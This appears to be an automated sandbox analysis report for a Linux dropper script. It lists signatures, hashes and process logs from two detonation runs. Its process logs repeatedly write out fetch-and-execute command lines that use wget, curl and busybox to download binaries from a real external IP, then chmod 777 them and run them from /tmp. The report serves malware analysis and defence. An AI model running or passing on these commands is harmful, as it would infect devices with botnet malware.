/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/bin/chmod
[chmod 777 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO
[./8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/bin/rm
[rm 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/usr/bin/wget
[wget http://87.120.126.196/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/bin/chmod
[chmod 777 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm
[./0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/bin/rm
[rm 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/usr/bin/wget
[wget http://87.120.126.196/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/bin/chmod
[chmod 777 tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX
[./tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/bin/rm
[rm tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
Files
/tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-28 02:12
Reported
2024-10-28 02:14
Platform
debian9-mipsel-20240611-en
Max time kernel
67s
Max time network
69s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | N/A |
| N/A | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | N/A |
| N/A | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | N/A |
| N/A | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | N/A |
| N/A | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | N/A |
| N/A | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | N/A |
| N/A | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | N/A |
| N/A | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | N/A |
| N/A | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | N/A |
| N/A | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | N/A |
| N/A | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | N/A |
| N/A | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | N/A |
| N/A | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | N/A |
| N/A | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | /usr/bin/curl | N/A |
| File opened for modification | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | /usr/bin/curl | N/A |
| File opened for modification | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | /usr/bin/curl | N/A |
| File opened for modification | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | /usr/bin/curl | N/A |
Processes
/tmp/19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f.sh
[/tmp/19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.126.196/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/bin/chmod
[chmod 777 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ
[./3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/bin/rm
[rm 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/usr/bin/wget
[wget http://87.120.126.196/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/bin/chmod
[chmod 777 gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7
[./gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/bin/rm
[rm gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/usr/bin/wget
[wget http://87.120.126.196/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/bin/chmod
[chmod 777 X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP
[./X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/bin/rm
[rm X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/usr/bin/wget
[wget http://87.120.126.196/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/bin/chmod
[chmod 777 XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
Files
/tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-28 02:12
Reported
2024-10-28 02:14
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
12s
Max time network
128s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | N/A |
| N/A | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | N/A |
| N/A | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | N/A |
| N/A | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | N/A |
| N/A | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | N/A |
| N/A | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | N/A |
| N/A | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | N/A |
| N/A | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | N/A |
| N/A | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | N/A |
| N/A | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | N/A |
| N/A | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | N/A |
| N/A | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | N/A |
| N/A | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | N/A |
| N/A | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | /usr/bin/curl | N/A |
Processes
/tmp/19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f.sh
[/tmp/19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.126.196/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/bin/chmod
[chmod 777 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ
[./3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/bin/rm
[rm 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
Network
Files
/tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |